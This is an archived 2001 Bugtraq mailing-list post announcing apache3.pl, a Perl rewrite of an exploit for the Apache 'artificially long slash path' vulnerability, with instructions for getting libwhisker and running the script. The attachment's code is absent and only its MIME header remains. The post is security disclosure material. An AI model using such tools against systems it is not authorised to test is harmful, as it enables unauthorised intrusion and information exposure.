[21251] in bugtraq


Re: Fw: Bugtraq ID 2503 : Apache Artificially Long Slash Path

daemon@ATHENA.MIT.EDU (rain forest puppy)
Fri Jun 29 03:15:36 2001

Date: Thu, 28 Jun 2001 18:06:52 -0500 (CDT)
From: rain forest puppy <rfp@wiretrip.net>
To: bugtraq@securityfocus.com
Cc: kmx@egatobas.org, siberian@sentry-labs.com
Message-ID: <Pine.LNX.4.10.10106281754440.3273-200000@eight.wiretrip.net>
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1640944207-528934193-993769116=:3273"
Content-ID: <Pine.LNX.4.10.10106281801510.3312@eight.wiretrip.net>

--1640944207-528934193-993769116=:3273
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.10.10106281801511.3312@eight.wiretrip.net>


Well, I might as well have my hand in recoding this exploit. ;)

Attached is apache3.pl, which is a recoded version of Siberian's recode of
Matt Watchinski's exploit.  My version uses libwhisker, which allows the
exploit to have HTTP/1.1, proxy, and SSL support automatically.  Basic
support (not including SSL) should work for any platform having Perl.

To use the attached exploit, you'll need a copy of libwhisker.  The latest
is pr3, downloadable at:
http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=7

You can either grab the developer tarball and build/install it, or just
grab the libwhisker.pm, put it in the same directory as the apache3.pl,
and just run apache3.pl--perl will use the libwhisker.pm module in the
same directory.

For SSL support, you'll need either Crypt::SSLeay or Net::SSLeay installed
(which may require OpenSSL).  I think ActiveState has ported
Crypt::SSLeay/Net::SSL (not Net::SSLeay) over to Windows, so Windows users
should have SSL support as well.

If anyone is interested in libwhisker and further using it, consider
joining the whisker-devel mailing list at:
http://sourceforge.net/projects/whisker/

And as always, feedback always welcome.  See everyone at BlackHat/DefCon!

- rfp

--1640944207-528934193-993769116=:3273
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="apache3.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.10106281758360.3273@eight.wiretrip.net>
Content-Description: 
Content-Disposition: ATTACHMENT; FILENAME="apache3.pl"
--1640944207-528934193-993769116=:3273--
